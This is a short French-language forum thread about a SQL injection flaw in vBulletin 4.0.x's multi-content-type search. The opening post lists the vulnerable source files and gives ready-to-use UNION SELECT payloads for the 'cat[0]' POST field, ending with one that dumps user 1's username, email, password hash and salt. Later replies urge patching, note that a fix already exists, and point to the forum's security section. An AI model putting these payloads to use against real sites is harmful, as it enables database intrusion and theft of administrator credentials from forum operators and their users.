IL SEMBLE QUE VOUS UTILISEZ ADBLOC POUR BLOQUER LA PUBLICITÉ, AUCUNE PUB INTRUSIVE SUR FDZ ET PAS DE POPUP
FDZ EST GRATUIT DONC MERCI DE DÉSACTIVER VOTRE ADBLOCK ET DE BIEN VOULOIR PARTICIPER ET JOUER LE JEU


PAR SUITE D'ABUS LES SERVEURS CCCAM ET ABONNEMENT NE SONT PAS TOLÉRÉS SUR LE FORUM

Affichage des résultats 1 à 5 sur 5
Share |

Discussion: faille 4.0.x vBulletin (Recherche) SQLI

  1. #1
    lakamora Visiteurs

    Non ou mauvais faille 4.0.x vBulletin (Recherche) SQLI

    --------------------------
    # ~Vulnerable Codes~ #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;

    --------------------------
    # ~Exploit~ #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"

    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    plus d'info sur : http://j0hnx3r.org/?p=818





    il devient bien pourri le vbulletin Cliquer ici pour agrandirCliquer ici pour agrandir

  2. #2
    lakamora Visiteurs

    Par défaut Re : faille 4.0.x vBulletin (Recherche) SQLI

    reparé cette faille au plus vite

  3. #3
    Date d'inscription
    février 2009
    Localisation
    California
    Messages
    2 568
    Remerciements
    38
    Remercié 53 fois dans 39 messages
    Pouvoir de réputation
    13

    Par défaut Re : faille 4.0.x vBulletin (Recherche) SQLI

    C'est déja corrigé, faut juste toujours MAJ, ca sert a ca aussi.

  4. #4
    lakamora Visiteurs

    Par défaut Re : faille 4.0.x vBulletin (Recherche) SQLI

    oué j'ai vue dans communauté il ya pas group
    ^^

  5. #5
    Date d'inscription
    juillet 2009
    Messages
    465
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    10

    Par défaut Re : faille 4.0.x vBulletin (Recherche) SQLI

    merci pour l'info;
    le bon emplacement c'est : Sécurité Informatique

    http://www.forumdz.com/forumdisplay....9-Informatique ;

Discussions similaires

  1. Réponses: 0
    Dernier message: 26/09/2012, 20h18
  2. Une faille dans tous les versions de vBulletin 4.x
    Par sad723 dans le forum Sécurité Informatique
    Réponses: 0
    Dernier message: 09/04/2011, 01h44
  3. VBulletin et RSS
    Par Mr_Diabloo dans le forum Développement DZ
    Réponses: 3
    Dernier message: 09/09/2008, 18h12
  4. VBulletin ou Phpbb2
    Par azraïne dans le forum Software (Logiciels)
    Réponses: 12
    Dernier message: 02/02/2008, 22h02

Liens sociaux

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •  
[Auto utilitaire DZ] [Webimag] [Algérie Info] [Guide Algérie] [Mosquée ALBADR MEAUX] [Photographe MARIAGE]

is PageRank Checking Icon